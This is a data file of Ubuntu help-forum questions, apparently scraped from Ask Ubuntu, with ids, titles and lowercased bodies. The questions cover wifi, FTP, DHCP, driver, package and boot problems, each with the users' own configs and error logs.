436388	wifi speed drop when pulling out charger	i can surf the web when i am charging my laptop , but when i pull my charger out to run on battery power , it looks like the internet speed drop to 0kb/s . i tried to turn acpi=off in grub.cfg this caused some unwanted effects ( so i changed it back to normal ) . when i did this my internet worked fine while charging and on battery power , but i lost my battery applet from the desktop panel . now i have the same problem - no internet on battery ... can anyone help me with this ? this might help : http : //pastebin.com/mgwzb0b8
436390	where place executables and how show them in the menu ?	i want to install a software ( modelio 3 ) . i have a folder with an executable and i can launch the app with that exe . but what i want to know is if i there is a folder like `` application '' on mac where i should paste the modelio folder ... and so the program will appear in the application menu .
436394	how to set up ftp server that can be viewed through the internet	i set up the ftp and the configurations are set as defaults . i got my domain from noip , and i set the ip of my server to that domain . i have heard that you need to port foward , but i do not know how to do this . i have an arris router , and i opened up ports 21 and 80 . i ca n't acess it through the internet .
436400	galaxy s2 device connect to vmware fails	i 'm trying to develop in vmware ( xamarin ) using my testing device ( galaxy s2 ) . this device connects correctly in ubuntu ( host os ) , but when i try to bridge this usb device to the guest os ( windows 8 ) it fails to bridge and the mtp connection keeps reconnecting and saying it fails to connect in ubuntu , nothing happens in the vm . how can i fix this ?
436402	creating multiuser chatroom in xmpp client	i am using the profanity xmpp client to create a multiuser chatroom in the terminal . my understanding of the xmpp protocol is that when you join a chatroom with a new name like /join newchatroom it automatically creates the new chatroom . it does n't do this for me , and i do n't know why . i 'm wondering if it has to do maybe with the default domain name the client assigns to the new chatroom , like newchatroom @ conference.gmail.com
436408	users ca n't login after migrating to new server	i am setting up a new ubuntu server 13.10 and copied over the user passwords and home directories from my old server ( 12.10 ) following the instructions i found here . unfortunately now i ca n't login to my new server using their existing passwords . i see the users when i run members users | grep username . any help on what i have to do to correct this would be much appreciated . update 3/20 : ok , here 's an update . yes , i could only login using my sudo password i created when installing server . when i did a `` members users '' i did see all my users , but none of there passwords worked . and now to the funny ( sad ) part . i could see the shadow file did not match the one on the old server . to make a long story short , i managed to so hose passwd & shadow i could n't even log in using recovery mode . i was able to boot with partedmagic and took copies of passwd , shadow , group , and gshadow off of my current working server ( 12.10 ) and just copied them into /etc , no crazy awk commands like in the link i sighted . on reboot i can login ok and also checked several users and they work now ? ? ? my concern is was it ok to just copy the four files ? will i run into troubles with groups or uids which i 'm not familiar with down the road ? also when booting into recovery mode do you still need a functioning passwd file with at least one admin password ? i thought the root you were getting was like a live cd where i could then add myself . instead i was getting an error message about an unknown uid i think and i couldnt login . thanx again if someone can give me insight into this . p.s . - i should add i changed the values on the commands from the site to 1000 & 29999 respectively .
436410	avatar_cache_open_cb : operation not supported	when i run gitg via ssh with x11 forwarding , each time i click one of the commits the following warning appears on my screen : ** ( gitg:25283 ) : warning ** : avatar_cache_open_cb : operation not supported this does not occur when i run gitg on a local machine . i could not find any documentation which is related to this warning ; i wonder whether this is an ssh thing , or whether i should file a bug here or there . what do you think ?
436412	saving an excel file on a windows shared folder using wine	i 'm not sure if anyone can help with this particular scenario but here goes . i am currently running ms office 2010 ( home and business ) on ubuntu 13.10 using playonlinux . i 'm able to open excel files locally and save them locally just fine with no issues . i can also open and view files on a windows shared folder just fine as well however , if i save the file , i get the following warning popup : the document was saved successfully , but excel can not re-open it because of a sharing violation . please close the document and try to open it again . when i look at the file permissions on the shared drive now , they are changed from -rwxrwx -- - to -- -- -- -- -- and no one is able to reopen the file . one more thing , i mounted the drive in the fstab with the following options : cifs rw , nosetuids , noperm 0 0 this is probably a ms office issue but i thought i 'd ask here first to see if anyone else has experienced this or know how to fix it . thanks !
436413	how to put system tools into gnome3 panel	i 'm sure it has been asked before , but i can not find the solution . i started using gnome3 , and everything is great . but , system tools has been put in applications . i want system to be a top level menu ? i tried tooling around in the configuration editor , but i could not figure it out . i read this : how to revert to gnome classic desktop ? but it doesnât take care of the system menu . then i start reading the free-desktop pages about basedir specifications but none of it was helpful . how , can i get my system menu back where it belongs . i mean that it belongs next to the places menu , and not under applications . mate has it , but mate breaks when i install cheese . so , where are the panel menus configured ? what file do i need to edit to get this looking right ? the system menu i refer to is high lighted here : i want it to reside to the right of `` places ''
436414	tftp trouble : timeout before file found	i 've installed tftp to the best of my knowlege , and am trying to perform a basic function test of get uimage when run in normal user , i get permission denied , when using sudo it replies back transfer timed out . with verbose mode on , it gives me getting from localhost : uimage to uimage [ netascii ] transfer timed out . i have no idea what 's gone wrong .
436415	ubuntu 12.04 lts + pureftpd-mysql goes 530 login authentication failed	i 've done this ( more or less ) by the book : http : //www.howtoforge.com/virtual-hosting-with-pureftpd-and-mysql-incl-quota-and-bandwidth-management-on-ubuntu-12.04 even have a script that automatically installs the server . but i keep getting the same error ( see @ end of post ) . please help me out with this : root @ ganymede : /etc/pure-ftpd # cat /etc/pure-ftpd/db/mysql.conf mysqlsocket /var/run/mysqld/mysqld.sock mysqluser pureftpd mysqlpassword xtt0i2evtuqi5nxx mysqldatabase pureftpd mysqlcrypt md5 mysqlgetpw select password from ftpd where user= '' \l '' and status= '' 1 '' and ( ipaccess = `` * '' or ipaccess like `` \r '' ) mysqlgetuid select uid from ftpd where user= '' \l '' and status= '' 1 '' and ( ipaccess = `` * '' or ipaccess like `` \r '' ) mysqlgetgid select gid from ftpd where user= '' \l '' and status= '' 1 '' and ( ipaccess = `` * '' or ipaccess like `` \r '' ) mysqlgetdir select dir from ftpd where user= '' \l '' and status= '' 1 '' and ( ipaccess = `` * '' or ipaccess like `` \r '' ) mysqlgetbandwidthul select ulbandwidth from ftpd where user= '' \l '' and status= '' 1 '' and ( ipaccess = `` * '' or ipaccess like `` \r '' ) mysqlgetbandwidthdl select dlbandwidth from ftpd where user= '' \l '' and status= '' 1 '' and ( ipaccess = `` * '' or ipaccess like `` \r '' ) mysqlgetqtasz select quotasize from ftpd where user= '' \l '' and status= '' 1 '' and ( ipaccess = `` * '' or ipaccess like `` \r '' ) mysqlgetqtafs select quotafiles from ftpd where user= '' \l '' and status= '' 1 '' and ( ipaccess = `` * '' or ipaccess like `` \r '' ) root @ ganymede : /etc/pure-ftpd # more conf/* : : : : : : : : : : : : : : conf/altlog : : : : : : : : : : : : : : clf : /var/log/pure-ftpd/transfer.log : : : : : : : : : : : : : : conf/chrooteveryone : : : : : : : : : : : : : : yes : : : : : : : : : : : : : : conf/createhomedir : : : : : : : : : : : : : : yes : : : : : : : : : : : : : : conf/displaydotfiles : : : : : : : : : : : : : : yes : : : : : : : : : : : : : : conf/dontresolve : : : : : : : : : : : : : : yes : : : : : : : : : : : : : : conf/fscharset : : : : : : : : : : : : : : utf-8 : : : : : : : : : : : : : : conf/ipv4only : : : : : : : : : : : : : : yes : : : : : : : : : : : : : : conf/limitrecursion : : : : : : : : : : : : : : 5000 500 : : : : : : : : : : : : : : conf/minuid : : : : : : : : : : : : : : 1000 : : : : : : : : : : : : : : conf/mysqlconfigfile : : : : : : : : : : : : : : /etc/pure-ftpd/db/mysql.conf : : : : : : : : : : : : : : conf/noanonymous : : : : : : : : : : : : : : yes : : : : : : : : : : : : : : conf/pamauthentication : : : : : : : : : : : : : : no : : : : : : : : : : : : : : conf/puredb : : : : : : : : : : : : : : /etc/pure-ftpd/pureftpd.pdb : : : : : : : : : : : : : : conf/unixauthentication : : : : : : : : : : : : : : no root @ ganymede : /etc/pure-ftpd # more auth/* : : : : : : : : : : : : : : auth/30mysql : : : : : : : : : : : : : : /etc/pure-ftpd/db/mysql.conf : : : : : : : : : : : : : : auth/65unix : : : : : : : : : : : : : : no : : : : : : : : : : : : : : auth/70pam : : : : : : : : : : : : : : no root @ ganymede : /etc/pure-ftpd # cat /etc/default/pure-ftpd-common # configuration for pure-ftpd # ( this file is sourced by /bin/sh , edit accordingly ) # standalone_or_inetd # valid values are `` standalone '' and `` inetd '' . # any change here overrides the setting in debconf . standalone_or_inetd=standalone # virtualchroot : # whether to use binary with virtualchroot support # valid values are `` true '' or `` false '' # any change here overrides the setting in debconf . virtualchroot=false # uploadscript : if this is set and the daemon is run in standalone mode , # pure-uploadscript will also be run to spawn the program given below # for handling uploads . see /usr/share/doc/pure-ftpd/readme.gz or # pure-uploadscript ( 8 ) # example : uploadscript=/usr/local/sbin/uploadhandler.pl uploadscript= # if set , pure-uploadscript will spawn $ uploadscript running as the # given uid and gid uploaduid= uploadgid= root @ ganymede : /etc/pure-ftpd # ftp localhost connected to localhost . 220 -- -- -- -- -- welcome to pure-ftpd [ privsep ] [ tls ] -- -- -- -- -- 220-you are user number 1 of 50 allowed . 220-local time is now 16:36 . server port : 21 . 220-this is a private system - no anonymous login 220 you will be disconnected after 15 minutes of inactivity . name ( localhost : dragosc ) : test 331 user test ok . password required password : 530 login authentication failed login failed . remote system type is unix . using binary mode to transfer files . root @ ganymede : /etc/pure-ftpd # tail -n 20 /var/log/syslog mar 19 15:41:24 ganymede pure-ftpd : ( ? @ 127.0.0.1 ) [ info ] new connection from 127.0.0.1 mar 19 15:41:31 ganymede pure-ftpd : ( ? @ 127.0.0.1 ) [ warning ] authentication failed for user [ test ] mar 19 15:41:53 ganymede pure-ftpd : ( ? @ 127.0.0.1 ) [ info ] logout . mar 19 15:57:38 ganymede pure-ftpd : ( ? @ 127.0.0.1 ) [ info ] new connection from 127.0.0.1 mar 19 15:57:47 ganymede pure-ftpd : ( ? @ 127.0.0.1 ) [ warning ] authentication failed for user [ test ] mar 19 16:07:49 ganymede dhclient : dhcprequest of 192.168.56.101 on eth1 to 192.168.56.100 port 67 mar 19 16:07:49 ganymede dhclient : dhcpack of 192.168.56.101 from 192.168.56.100 mar 19 16:07:49 ganymede dhclient : bound to 192.168.56.101 -- renewal in 1490 seconds . mar 19 16:12:47 ganymede pure-ftpd : ( ? @ 127.0.0.1 ) [ info ] timeout - try typing a little faster next time mar 19 16:17:01 ganymede cron [ 3484 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) mar 19 16:32:39 ganymede dhclient : dhcprequest of 192.168.56.101 on eth1 to 192.168.56.100 port 67 mar 19 16:32:41 ganymede dhclient : dhcpack of 192.168.56.101 from 192.168.56.100 mar 19 16:32:41 ganymede dhclient : bound to 192.168.56.101 -- renewal in 1647 seconds . mar 19 16:36:03 ganymede pure-ftpd : ( ? @ 127.0.0.1 ) [ info ] new connection from 127.0.0.1 mar 19 16:36:13 ganymede pure-ftpd : ( ? @ 127.0.0.1 ) [ warning ] authentication failed for user [ test ] mar 19 16:36:56 ganymede pure-ftpd : ( ? @ 127.0.0.1 ) [ info ] logout . with system users it works perfectly . with virtual users , on the other hand ... could you please help with what i 'm missing ? i know this question is all over the internet & forums , but i still could n't find the problem . thanks in advance .
436418	how to recover permanant deleted files from ext4	hey guys i am kind of new in ubuntu and i need help . i permanently deleted my important files and i need to recover them . please tell how to recover files in gui way or command line way . thanks : )
436425	assign website to ip address	i have a server with 2 ip addresses . all the websites are in separate folders in /var/www/ . for example /var/www/website1 and /var/www/website2 . the nameservers point some of the websites on ip address 12.34.56.78 and some on ip address 90.78.56.34 . all the websites on ip address 12.34.56.78 work but the websites on ip address 90.78.56.34 do n't . how do i configure the websites to be on ip addres 90.78.56.34 ?
436426	installing python-appindicator in 13.10	i 'm trying to install python-appindicator in ubuntu 13.10 but i 'm receiving not found error : e : unable to locate package python-appindicator how can i install python-appindicator in 13.10 ?
436430	ubuntu 12.04 randomly freezes	hello . i use ubuntu 12.04 with wubi . the problem is that ubuntu randomly freezes when i move the mouse cursor . the system doesent have to restart i just have to press ( ctrl+alt+f1 ) and then ( ctrl+alt+f7 ) this works and i can use ubuntu a bit more but then it freezes again . i am using asus k53sm laptop with 4gb ram , intel i5 processor and nvidia gt 630m . is there a way to fix this problem ? im sorry if this is a duplicate , i dident find a ubuntu freeze problem like this .
436431	installing libgl1-mesa-glx : i386	04 ( 32 bit ) precise version.while i 'm installing this libgl1-mesa-glx : i386 its shows the following error ... ... .. the following packages have unmet dependencies : libgl1-mesa-glx : depends : libglapi-mesa ( = 8.0.4-0ubuntu0.7 ) recommends : libgl1-mesa-dri ( > = 7.2 ) ... ... . then i ready to install libglapi-mesa on my system it may remove my ubuntu desktop videocore library then my system becomes unable to work . how could i install this mesa library ( libgl1-mesa-glx : i386 ) .i want to use this library for creating an android build environment .
436432	long delay on boot after fb0 : vesa vga frame buffer device	i have a ubuntu pc with 2 amd r9 cards and i get a long delay on boot ( around 2 minutes ) . when i check dmesg i get the following : [ 16.128179 ] hda-intel 0000:03:00.1 : enable sync_write for stable communication [ 16.129809 ] input : hda ati hdmi hdmi/dp , pcm=11 as /devices/pci0000:00/0000:00:0f.0/0000:03:00.1/sound/card2/input16 [ 16.130129 ] input : hda ati hdmi hdmi/dp , pcm=10 as /devices/pci0000:00/0000:00:0f.0/0000:03:00.1/sound/card2/input17 [ 16.130309 ] input : hda ati hdmi hdmi/dp , pcm=9 as /devices/pci0000:00/0000:00:0f.0/0000:03:00.1/sound/card2/input18 [ 16.130483 ] input : hda ati hdmi hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:0f.0/0000:03:00.1/sound/card2/input19 [ 16.130657 ] input : hda ati hdmi hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:0f.0/0000:03:00.1/sound/card2/input20 [ 16.130832 ] input : hda ati hdmi hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:0f.0/0000:03:00.1/sound/card2/input21 [ 18.255760 ] vesafb : mode is 640x480x32 , linelength=2560 , pages=0 [ 18.255766 ] vesafb : scrolling : redraw [ 18.255769 ] vesafb : truecolor : size=0:8:8:8 , shift=0:16:8:0 [ 18.261233 ] vesafb : framebuffer at 0xe0000000 , mapped to 0xf8a80000 , using 1216k , total 1216k [ 18.261421 ] console : switching to colour frame buffer device 80x30 [ 18.263738 ] fb0 : vesa vga frame buffer device [ 136.404926 ] fglrx_pci 0000:02:00.0 : irq 45 for msi/msi-x [ 136.405975 ] < 6 > [ fglrx ] firegl kernel thread pid : 1053 [ 136.406131 ] < 6 > [ fglrx ] firegl kernel thread pid : 1054 [ 136.406237 ] < 6 > [ fglrx ] firegl kernel thread pid : 1055 [ 136.406406 ] < 6 > [ fglrx ] irq 45 enabled [ 136.421969 ] < 6 > [ fglrx ] reserved fb block : shared offset:0 , size:1000000 [ 136.421973 ] < 6 > [ fglrx ] reserved fb block : unshared offset : fac3000 , size:3000 [ 136.421975 ] < 6 > [ fglrx ] reserved fb block : unshared offset : fac6000 , size:23a000 [ 136.421978 ] < 6 > [ fglrx ] reserved fb block : unshared offset:7fff4000 , size : c000 [ 136.472460 ] fglrx_pci 0000:03:00.0 : irq 46 for msi/msi-x i am using proprietary amd 13.12 drivers on ubuntu 13.10 32 bit system . any solutions to that ?
436435	moving windows between workspaces with keyboard shortcuts	since the upgrade to 13.10 , there is an annoying bug : when i try to move a window to a different workspace using the ctrl + shift + alt + arrow nothing happens . however if i press ctrl + alt + arrow to change workspace , then go back to the previous workspace and without releasing the ctrl and alt keys i press shift followed by the arrows , the active window gets displaced to the workspace as desired . is this a bug or is there a setting simply interfering with the `` move to workspace '' shortcuts ?
436439	wi-fi broadcom lan not working on acer extensa 4620z	my wi-fi driver is not working on acer extensa 4620z . i am new to using ubuntu , does anyone have any answers so i can fix my wi-fi ? here are the details from the terminal : lspci -nn | grep 0280 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 )
436440	how to create a new internal dhcp server on ubuntu ?	in office , we have a router which provides dhcp features and its subnet is 192.168.1.x . the router ip is 192.168.1.1 . i want to setup a new subnet to try hadoop cluster using isc-dhcp-server on ubuntu 12.04 . on my ubuntu server , its ip address allocated by the existing router 192.168.1.1 is 192.168.1.111 , i configured it in /etc/network/interfaces file like below : auto eth0 iface eth0 inet static address 192.168.1.111 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 8.8.8.8 dns-search defaultdomain then i try to use eth0 in /etc/default/isc-dhcp-server file interfaces= '' eth0 '' in /etc/dhcp/dhcpd.conf file , i configured a new subnet : option domain-name `` hadoop.cn '' ; default-lease-time 6000 ; max-lease-time 72000 ; option routers 192.168.4.1 ; subnet 192.168.4.0 netmask 255.255.255.0 { range 192.168.4.10 192.168.4.100 ; option domain-name-servers 192.168.4.1 ; option broadcast-address 192.168.4.255 ; } but the service restart failed . i got error log : mar 19 14:41:10 dhcp dhcpd : ** ignoring requests on eth0 . if this is not what mar 19 14:41:10 dhcp dhcpd : you want , please write a subnet declaration mar 19 14:41:10 dhcp dhcpd : in your dhcpd.conf file for the network segment mar 19 14:41:10 dhcp dhcpd : to which interface eth0 is attached . ** mar 19 14:41:10 dhcp dhcpd : mar 19 14:41:10 dhcp dhcpd : mar 19 14:41:10 dhcp dhcpd : not configured to listen on any interfaces ! mar 19 14:41:10 dhcp kernel : [ 5194.129326 ] init : isc-dhcp-server main process ( 1894 ) terminated with status 1 mar 19 14:41:10 dhcp kernel : [ 5194.129363 ] init : isc-dhcp-server respawning too fast , stopped how to fix this ?
436441	pkill not killing	i have a script named pirateradio.py that i am writing a script for . i need to kill and reload the script . possibly with the same pid . i thought sighup was a sure thing . when i run # pkill -1 pirateradio.py nothing happens . radio keeps on going . ok , i tried # pkill -9 pirateradio.py still nothing , radio keeps right on . ps aux | grep pir root 987 45.7 10.8 1266088 433868 ? sl mar15 2728:13 /root/pirateradio.py root 24924 0.0 0.0 4388 800 pts/0 s+ 11:13 0:00 grep pirateradio.py so then i tried # kill -s 1 987 nothing happens . # kill -s 1 987 then , system hang . so i dont want that , i guess . so then i use : # kill -s 9 987 which kills the script well enough . iâve used pkill on my other desktops , what is going on here ? where can i look to find out what pkill is or isnât doing ? i looked in dmesg , but saw no change after running pkill i saw no verbose option in pkill man pages..
436443	what is the easiest way to fix a mixup of 32-bit and 64-bit ?	i have a machine which i have accidentally install 32-bit 12.04 lts on . ( yes , accidentally . i ca n't recall how i managed that . ) what is the easiest way to fix this ? mucking about with the kernel files or axing it with a reinstall ? is it possible and safe to have a dual boot of 32 and 64-bit 12.04 lts ?
436444	font problem in firefox	i have some unusual problem in firefox , the font in firefox is not working properly , it become narrow then rest of the windows font , sometimes it looks very small , i have tried default settings of font in firefox , but it was not helpful , pleas if someone can help me it would be a great pleasure for me , , , i am giving a link to visualize the situation ,
436445	why does apache2 default to lang=c instead of utf8 or system default	the 10-year-old comment in /etc/apache2/envvars simply says `` the locale used by some modules like mod_dav '' , but why ca n't mod_dav be fixed to also handle a better lang setting for the rest of apache ?
436446	wifi is not conneting	i had installed ubuntu 13 10 my ethernet is working fine . but when i want to connect with my wi-fi it ask me a key after entering the key it again ask me for the key but its not connecting to my wi-fi network .
436447	trying to resolve â can not open shared object file libudev.so.0â ? getting too many levels of symbolic links problem	i was trying to solve the problem highlighted here : but whenever i execute ln -s libudev.so.1 libudev.so.0 or even ln -s libudev.so.0 libudev.so.1 i get too many symbolic links error i know i 'll have to redo the symbolic links , but how ?
436458	need help to make this file work in iptables	i came across the following example of how to use iptables to block internet access when the vpn connection is terminated abruptly : iptables -a input -i lo -j accept iptables -a output -o lo -j accept # allow loopback access iptables -a output -d 255.255.255.255 -j accept # make sure you can communicate with any dhcp server iptables -a input -s 255.255.255.255 -j accept # make sure you can communicate with any dhcp server iptables -a input -s 192.168.0.0/16 -d 192.168.0.0/16 -j accept # make sure that you can communicate within your own network iptables -a output -s 192.168.0.0/16 -d 192.168.0.0/16 -j accept iptables -a forward -i eth+ -o tun+ -j accept iptables -a forward -i tun+ -o eth+ -j accept # make sure that eth+ and tun+ can communicate iptables -t nat -a postrouting -o tun+ -j masquerade # in the postrouting chain of the nat table , map the tun+ interface outgoing packet ip address , cease examining rules and let the header be modified , so that we do n't have to worry about ports or any other issue - please check this rule with care if you have already a nat table in your chain iptables -a output -o eth+ ! -d a.b.c.d -j drop # if destination for outgoing packet on eth+ is not a.b.c.d , drop the packet , so that nothing leaks if vpn disconnects i have installed iptables-persistence and would like to know how to use the above to work with iptables . any help would be much appreciated . p.s . : i do not have much it knowledge and even less of ubuntu . could someone explain to me how does one obtain the value 192.168.0.0/16 ?
436462	how would i tell the last time apache served a file ?	i 'm trying to figure out how to tell the last time a .php file was served by apache . i have written an application on an ubuntu lamp stack with mysql & php . i have 1000s of files and i 'm trying to `` clean house '' . i 'd like to know how to list all the files in the folder by the last time apache actually served it . it this even possible ? update sorry , i should have been a little more detailed . i 'm looking for all files that would include every file that was included with a php script like < ? php include `` i_cant_see_this_file_in_the_logs.php '' ; ? > hopefully that shines a little more light . thank you .
436464	cloning ubuntu 13.10	i have 200 windows 7 laptops that were just delivered . i have a test laptop that i have setup with ubuntu . what is the best way to clone the new laptops to exactly match the identical ubuntu ( setup the way i want ) laptop . i 've tried many things : 1 ) drbl will not load because it can not find the imp file ( i had great hopes for this one ) 2 ) fog will not run on ext
436467	i want to install java on ubuntu 13.04 , but i got this type of problem during installing java	problem is that : apt-get install default-jre e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? before that i 've already run update command it was ok but at last i got this type of message : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
436468	how do i get thumbnails when viewing -- and particularly uploading - photo files	coming from the windows world , i am used to being about to change the `` view '' when viewing files , to show thumbnails of pictures for instance or to just show file names and details like size and location . ( there are a few similar questions to this , but none that i 've looked at actually answer the question . ) so far ( this is day 2 back on ubuntu after a long hiatus ) i am not finding a way to see large thumbnails when looking at a lot of pictures for instance . i get small thumbnails , but they are too small to discern which picture is which . furthermore , when trying to upload a number of photos to a site ( for instance an ad to craigslist ) , i do n't get any thumbnail/previews at all . just file names . which makes managing photos impossible . i had to switch back to windows in order to find and upload photos to my ads . reading a bit further in the similar questions , it appears that what i am after simply does n't exist in ubuntu . is that so ? ( if so , it 's a fairly major deficiency i would say . )
436472	12.04.4 picking up wrong graphic card	nvidia proprietary driver worked fine in 11.10 and update from 12.04.1 thru 12.04.2 . the next update , my system crashed ( as many have reported ) . did fresh install of 12.04.4 and activating any of the nvidia drivers from the gui interface causes freeze on reboot . the nouveau drivers included in the kernel work surprisingly well but not good enough for my main application ( second life ) . using the x-swap repositories and installing `` current '' , i am up and running in all applications , however , second life fps are abysmal . in addition , crashes to the desktop occur frequently . so , inxi -sgx reports my card as nvidia c77 [ geforce 8200 ] . however , my gpu is a geforce 9200 . it 's an integrated graphics card with no other card present . how can i force ubuntu ( or mint for that matter since one is a subset of the other ) , to pick up on my correct gpu ?
436475	unity occaissionally does n't show app icons that i just opened	it 's not consistent , but on random apps ( and i mean anything from ksp to ubuntu software center ) when i open the app it might not appear in the launcher . example is this just a bug in ubuntu 12.04 lts ? it 's not ground breaking , just a little confusing . i should add i have the multiple desktops turned off ( set to 1 by 1 ) , perhaps that 's part of the problem . ( side question , does having multiple desktops use up resources ? i do n't have a kick ass computer so where i can save i do , though ram is n't my issue , it 's my apu )
436476	how can i remove a package	i have encounter a problem when i install a package , the error message : $ dpkg -i 116667-ubuntu\ xsplash\ clean\ theme.deb ( reading database ... 265031 files and directories currently installed . ) preparing to unpack 116667-ubuntu xsplash clean theme.deb ... mkdir : can not create directory '/usr/share/images/ubuntu-default ' : no such file or directory cp : can not stat '/usr/share/images/xsplash ' : no such file or directory dpkg : error processing archive 116667-ubuntu xsplash clean theme.deb ( -- install ) : subprocess new pre-installation script returned error exit status 1 rm : can not remove '/usr/share/images/xsplash ' : no such file or directory mkdir : can not create directory '/usr/share/images/xsplash ' : no such file or directory cp : can not stat '/usr/share/images/ubuntu-default ' : no such file or directory dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 errors were encountered while processing : 116667-ubuntu xsplash clean theme.deb $ dpkg -l xsplash-clean message desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= ihr xsplash-clean 1.0 i386 ( no description available ) how can i fix this error ?
436478	automatically install package dependencies with terminal	i have a .deb file in my downloads folder than i need to install with a bunch of dependencies . what is a command that will install the package with the dependencies . i know this is probably a duplicate but i just want the command to install the package from the downloads folder and automaticly install dependencies , because i do n't know much about the terminal
436479	how can i wirte the gnu grub boot cd in hard disk	i could not have dual boot in my hard disk . when i fix the hard disk for dual boot windows 7 / ubuntu using easybcd dont boot ubuntu 12.04 lts , when i fix the hard disk for dual boot ubuntu / windows 7 using boot repair dont boot windows 7 . then , in this moment , i boot my ubuntu 12.04lts normally from hard dik and , when i need to start windows 7 , i boot for windows using a super gnu grub2 cd ( with this cd i can boot both systems ! ! ) . the question is : how can i write this cd boot comands , or something like this , in the hard disk in order to make the same work of cd boot but without using the cd drive ? thanks in advance
436485	ubuntu 13.10 and prior : fuzzy display . np700z7c . pastebin and screenshot included	model : samsung-series-np700z7c-s01us intel hd4k + 650m http : //pastebin.com/ku2mzhya < -- xrandr -- verbose issue : http : //imgur.com/ven091g hdmi output is normal . vga output is normal .
436486	installation problem with ubuntu 12.04.4	i am trying to install ubuntu 12.04.4 on my dell inspiron 5520 using wubi . it makes my machine reboot , and starts installation . the problem is - as the installation comes to the step 'preaparing to install ' , it shows me hourglass and freezes . i waited for 4 hours once , but it never proceeds . what should i do ?
436488	install nvidia driver for cuda to use `` gpu '' option in blender ( ubuntu ( 13.10- ) 14.04 )	same question as on the blender stackexchange site . as a recap : i have to install the nvidia driver but how to do it ? ( repository or manually ? and i already had problems with both , as said ) my computer detects an other graphic card as the one that i have ! ( maybe the reason why no proprietary drivers are purposed ) every help is welcome ! it came out that the problem was that i have optimus . but in 14.04 it seems to be supported . so , under 14.04 ( on my external hdd ) it detects my nvidia driver out of the box ! ! ! but with blender and cuda installed as said on this site and this driver : i then installed blender from this ppa as well as the cuda driver from the same site . then , blender detects the gpu ! ! ! but it says ( cycles mode with gpu rendering active ) : even with experimental on : but on the site , thay say that cuda < 2.0 is experimental : should i wait , or could it help if i use another driver ?
436493	how to reset default interface of vlc ?	i was playing with vlc skins downloaded from gnome-look.org . and now , i think , my vlc is bricked . it shows this error message on terminal : [ 0x1b15f08 ] skins2 interface error : no skins found : exiting . i do n't wan na reinstall it either . ~ $ vlc vlc media player 2.0.8 twoflower ( revision 2.0.8a-0-g68cf50b ) [ 0xd6df08 ] skins2 interface error : no xml found in theme /home/amol/download/alienwarevlcinvader.zip [ 0x7ff4e801d8f8 ] xml xml reader error : xml parser error ( line 1 ) : document is empty [ 0xd6df08 ] skins2 interface error : no skins found : exiting please help ...
436495	data recovery in ubuntu 12.04	i have ubuntu 12.04 dual booted with windows 8 . while i was using ubuntu , all of a sudden my system went into a suspend mode and when i logged back in all my data was gone . it was ubuntu in its pristine form . though some applications like pidgin , file zilla , google chrome , xsensors etc . still continue to work . windows , on the other hand , is working perfectly fine . how can i recover my data ? i need my data badly !
436501	why are 'source ' and ' . ' not always the same , when they 're supposed to be identical ?	i was under the impression that source was a synonym for . in bash . however , it seems that in the .profile file , source does n't work . this youtube video demonstrates that when source is used in ~/.profile to source a file foo , the variable defined in that file is not exported to subsequent shells . however , if instead the file is sourced using . , the variable is exported as expected . note that when i use source , the environment variable does not get exported , but when i use . it does .
436503	deja-dup google drive support	i tried to search to see if google drive is supported the same way ubuntu one is supported for deja-dup but i have n't seen anything concrete . i do n't want to store a local copy of the backed up files , but rather put it directly to the google drive account and prevent it from being sync 'd .
436508	duplex printing with mp495 ?	dear ubuntu community , i recently switched from xp to xubuntu , i like it very much but at this moment i have an problem . i often have to print and always use duplex ( two-sided printing ) . i ca n't find the setting for duplex in cups-application or in the web-based cups libre-office does n't give the suggestion either . the printing works just fine ( even wireless ) only one-sided . drivers i used are the official linux drivers van canon . see the link . canon.nl/support/consumer_products/products/fax__multifunctionals/inkjet/pixma_mp_series/pixma_mp495.aspx some search suggested me this program gnome-manual-duplex from canon.nl/support/consumer_products/products/fax__multifunctionals/inkjet/pixma_mp_series/pixma_mp495.aspx but than i need the following extra packages ; python-gnome2-desktop , python-gnome2-desktop , gnome-shell . i do n't wan na have a complete gnome-shell on my system . summary questions . is there a way a i can use duplex printers with these drivers ? will other firmware solve my problem ? some experience from users here ? can i use the suggested program without completely downloading gnome-shell ? it seems a little to much for such a simple program ? any other suggestions are welcome , i 'm new to linux but no a complete noob and not afraid of the commandline . *english is my third language but i tried to be as clear as possible .
436513	ca n't get my wireless worked , it keep loading	i just have installed ubuntu 12.04 and the broadcom driver . when i try to connect to my wifi , it keep loading and asking for my password .
436514	can not install packages with apt , synaptic or the ubuntu software center	my problems started when i tried to fix a wireless connectivity issue i was having by reinstalling bcmwl-kernel-source for starters . i believe this failed and is causing the error below . i get the following when i try to install a package : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? spectralink @ spectralink-latitude-d510 : ~ $ when i perform the following command i see the below : spectralink @ spectralink-latitude-d510 : /var/lib/dpkg/info $ ps ax | grep dpkg 2371 pts/0 t 0:00 sudo dpkg -- configure -a 2372 pts/0 t 0:00 dpkg -- configure -a 2373 pts/0 t 0:00 /bin/sh /var/lib/dpkg/info/bcmwl-kernel-source.postinst configure 4151 pts/0 s+ 0:00 grep -- color=auto dpkg i 'm thinking this is what broke my ability to install packages . i have tried numerous suggestions from various forums with no luck . any help/direction with this would be appreciated . thank you .
436516	how do i get my epson scanner working on ubuntu 13.10	i have the epson sx218 with a built-in scanner . the printer works fine but if i want to scan something simple scan says no scanner found . any ideas what i can do ? by the way , how can i check the ink level of the printer ? ?
